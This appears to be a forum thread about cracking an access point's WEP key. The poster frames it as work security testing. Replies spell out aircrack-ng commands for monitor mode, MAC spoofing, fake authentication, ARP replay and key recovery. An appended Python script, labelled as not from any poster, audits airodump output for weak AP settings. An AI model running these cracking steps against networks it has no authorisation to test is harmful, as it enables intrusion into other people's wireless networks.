This is not a how-to or tutorial. Please post in the correct section of the forums.
First I must say, wonderful job on the vol. 4. I think going to Ubuntu will be well worth it; sucks for the gurus right now, but like I said it will be worth it.
As for my problem:
Scenario:
At work, trying to crack an AP's WEP. I will have to do this a lot more, since it will be my job to test the security of wireless APs, which will have WPA2. Trying to crack WEP now, for knowledge, and it seems logical. The AP has no clients, and the ESSID is not broadcast. I decided to ask my co-worker what the AP's ESSID was, so that I could troubleshoot whether it was a user error or not.
Card: 3945 iwl
airmon-ng
airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
airodump-ng (interface)
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
The command above is where I get stuck; the aircrack tutorial says to "Do not proceed to the next step until you have the fake authentication running correctly."
The terminal comes back and states
Sending Authentication Request (shared) [ACK]
Authentication 1/2 successful
Sending encrypted challenge
Attack was unsuccessful
Then gives me a list of reasons why it did not work.
NEVERMIND this post....Figured it out.....You have to at least have prior data to crack WEP
duh: http://forums.remote-exploit.org/wireless/6535-wep-cracking-no-clients-no-ssid.html
I read the forum discussion; it really cleared up a lot. I recommend to all future newbs (including myself) to really read the aircrack site.
Just to make sure, and please someone post if this is true:
"The tutorials are about the situation when you see no client :
hxxp://www.aircrack-ng.org/doku.php?...ith_no_clients
but to do the fragmentation you need the WEP encrypted data, thus either it is from a previous session or from a nonvisible client, as there is no data obtained from fakeauth. When you read any tutorial look at the MACs in collected packets used for the frag attack.
If you have no client connected (wlan or lan) you have no data to collect, thus cannot attack the AP unless you have previously collected data.
LAN client can send data through wireless when addressing wireless client"
Last edited by kiloraw; 01-22-2010 at 09:32 PM. Reason: Figured out my own problem...
Well I do WEP like this
Here is a guide
Code:
airmon-ng stop wlan0
airmon-ng start wlan0
"I'll be using mon0 (it's now in monitor mode)"
airodump-ng mon0 -w /tmp/WEP --channel (AP channel) --bssid (AP bssid)
NEW CONSOLE
aireplay-ng -1 0 -a (AP bssid) mon0
NEW CONSOLE
aireplay-ng -3 -b (AP bssid) mon0
Wait until the number in the newest console is over 30000 (the second number)
Then stop all of these
Then
aircrack-ng /tmp/WEP-01.cap
http://www.aircrack-ng.org/doku.php?...ith_no_clients
Yes, I use the no-clients WEP hack even if there are clients
Last edited by halfdone; 01-23-2010 at 12:15 PM.
You need fake auth with shared key...
Shared key can be hooked when a client connects to the AP...
To hook the shared key you can use airodump-ng, and wait until someone connects
Then you have to fake auth
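For the defensive side of the job described in this thread (checking access points that are supposed to be on WPA2), here is an added example that is not from any poster: it reads the CSV summary that airodump-ng writes with -w and lists APs still on WEP, using shared-key authentication, or not broadcasting their ESSID. The sample data is constructed, and the column layout is assumed to match airodump-ng's CSV output.

```python
# Added example: audit an airodump-ng CSV summary for weak AP settings.
# SAMPLE_CSV is constructed (made-up MACs/ESSIDs); column layout is assumed.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:AA:BB:01, 2010-01-22 20:01:10, 2010-01-22 20:31:10,  6,  54, WEP , WEP, SKA, -48,     1800,        0,   0.  0.  0.  0,   0, ,
02:00:00:AA:BB:02, 2010-01-22 20:01:12, 2010-01-22 20:31:09, 11,  54, WPA2, CCMP, PSK, -60,     1750,        0,   0.  0.  0.  0,   9, corp-wifi,
02:00:00:AA:BB:03, 2010-01-22 20:01:15, 2010-01-22 20:31:11,  1,  54, WEP , WEP, OPN, -71,     1600,     5321,   0.  0.  0.  0,   5, guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:CC:DD:01, 2010-01-22 20:05:00, 2010-01-22 20:30:58, -55,      420, 02:00:00:AA:BB:03, guest
"""

def parse(text):
    """Split the file into AP rows and a per-BSSID count of associated stations."""
    aps, clients, section = [], {}, None
    for line in text.splitlines():
        f = [c.strip() for c in line.split(",")]
        if f[0] == "BSSID":
            section = "ap"
        elif f[0] == "Station MAC":
            section = "sta"
        elif section == "ap" and len(f) >= 15:
            # ESSID may itself contain commas; Key is always the last field.
            aps.append({"bssid": f[0], "privacy": f[5], "auth": f[7],
                        "id_len": f[12], "essid": ",".join(f[13:-1]).strip()})
        elif section == "sta" and len(f) >= 6 and f[5] != "(not associated)":
            clients[f[5]] = clients.get(f[5], 0) + 1
    return aps, clients

def audit(text):
    """Return {bssid: [findings]} for every AP with at least one finding."""
    aps, clients = parse(text)
    report = {}
    for ap in aps:
        findings = []
        if "WEP" in ap["privacy"].split():
            findings.append("WEP in use")
        if ap["auth"] == "SKA":
            findings.append("shared-key authentication")
        if ap["id_len"] == "0" or not ap["essid"]:
            findings.append("ESSID not broadcast")
        if findings and clients.get(ap["bssid"], 0) == 0:
            findings.append("no associated clients seen")
        if findings:
            report[ap["bssid"]] = findings
    return report

if __name__ == "__main__":
    print(audit(SAMPLE_CSV))
```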